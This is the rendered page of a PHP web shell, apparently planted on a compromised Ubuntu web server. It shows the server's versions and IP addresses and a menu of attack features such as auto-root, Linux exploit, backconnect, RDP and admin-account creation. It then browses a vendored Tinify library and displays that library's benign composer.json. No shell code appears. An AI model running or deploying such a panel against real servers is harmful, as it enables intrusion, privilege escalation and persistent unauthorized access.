Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.138.141.138
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
vendor /
tinify /
tinify /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.gitignore
7
B
-rwxr-xr-x
.travis.yml
1.8
KB
-rwxr-xr-x
CHANGES.md
246
B
-rwxr-xr-x
LICENSE
1.05
KB
-rwxr-xr-x
README.md
1.15
KB
-rwxr-xr-x
composer.json
804
B
-rwxr-xr-x
composer.lock
33.13
KB
-rwxr-xr-x
phpunit.xml
333
B
-rwxr-xr-x
update-cacert.sh
360
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "tinify/tinify", "description": "PHP client for the Tinify API. Tinify compresses your images intelligently. Read more at https://tinify.com.", "keywords": [ "tinify", "tinypng", "tinyjpg", "compress", "images", "api" ], "homepage": "https://tinify.com/developers", "license": "MIT", "support": { "email": "support@tinify.com" }, "authors": [{ "name": "Rolf Timmermans", "email": "rolftimmermans@voormedia.com" }], "require": { "php": ">=5.3.0", "ext-curl": "*", "ext-json": "*", "lib-curl": ">=7.20.0" }, "require-dev": { "symfony/yaml": "~2.0", "phpunit/phpunit": "~4.0" }, "autoload": { "files": ["lib/Tinify.php", "lib/Tinify/Exception.php"], "psr-4": {"Tinify\\": "lib/Tinify/"} } }
Close